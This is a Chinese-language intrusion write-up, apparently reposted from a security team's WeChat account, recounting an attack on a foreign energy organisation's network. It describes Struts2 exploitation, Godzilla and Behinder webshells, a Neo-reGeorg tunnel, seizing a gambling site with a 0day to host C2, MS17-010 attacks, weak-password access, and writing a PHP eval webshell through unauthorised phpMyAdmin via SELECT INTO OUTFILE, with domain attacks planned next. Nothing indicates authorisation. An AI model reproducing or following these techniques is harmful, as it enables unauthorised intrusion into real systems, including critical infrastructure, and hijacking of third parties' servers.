此次渗透非常感谢HashRun安全团队HashMeow小组成员协作;感谢如下师傅:闲客,伊恒,秋风,fish
主域名 https://www.xxxxx.com
漏洞链接
https://vms.xxxxx.com:xxxx/xxxxxxx/xxxxxx.action漏洞名称 Struts2
哥斯拉?
https://vms.xxxxx.com:xxxx/xxxxxxx/ll.jsp冰蝎4.0.5 Xor_base64协议
https://vms.xxxxxx.com:xxxxx/xxxxx/xxxxx.jspNeo-regeorg 隧道 密码lan
https://vms.xxxx.com:xxx/xxxxxx/tunnel.jsp这部分也是通过信息收集,看到.action直接st2一把梭
代理机部署
因为这次行动是在疫情,xj疫情当时大家应该都知道,公司没办法给我们提供匿名服务器,所以我们只能自己打一台下来,然后部署c2
伊恒哥哥一个0day梭哈下来一台bc,拿到bc之后我们开始搭建c2以及流量代理
外加c2
内网信息收集
简单扫大概扫下
虽然有几个段重了,问题不大,我们大概看了一下估计有6个域以上,国外内网确实安全,大概最少有600台机器(保守点估计)然后发现弱口基本就在2位数,ms17010也就个位数
先把ms17010打了,发现一个坑点,msf不能打03,08并且很容易打崩,换上大佬工具,梭哈
不全部放图了,因为千篇一律,我们接下来看下域,发现都在域内
然后大佬工具自带rdp登录模板,直接开启rdp登录
发现不是远程登录组,先放下
因为入口是Linux机器,不太好当鼠标猴子,虽然有cross2加持,我们继续寻找内网中出网的机器,前面几台ms17010下来的机器进行出网探测均发现只有dns出网,然后exe丢上去稍稍有点麻烦,先放下,去看下web资产能不能getshell几个找个出网的win,毕竟内网中有几k台机器呢,总有一个出网win
然后又发现一些未授权的
弱口
太多了,不截图了
发现也没啥太大用处,先放下,继续往下看,发现一个oracle
是个普通权限,我记得是可以直接弹回shell的
ok找到一个win发现还是tm不出网,只有dns出,很麻烦,上传exe又要走出口机
后续又发现一些弱口和未授权
这些机器大多也是工业机器
最后找到一台所有协议都出网的win
http://10.36.32.36/?phpinfo=1进phpinfo,找到绝对路径C:wamp/www
http://10.36.32.36/phpmyadmin/未经授权进到phpmyadmin,查看权限是all
在数据表的sql直接写入
select "<?php @eval($_POST[cc]);?>" into outfile 'C:/wamp/www/shell.php'http://10.36.32.36/log.php成功
蚁剑挂代理验证
后续,还没在c2上上线这个win,因为我在准备期末考试,期末考完之后,我又被别人支配的去整代码审计,整完这些快过年了
下一步计划就是经行域渗透吧,整整pth,ptt,ptk等,这些,到时候再更新
原文始发于微信公众号(HashRun安全团队):对某国能源打点(上)
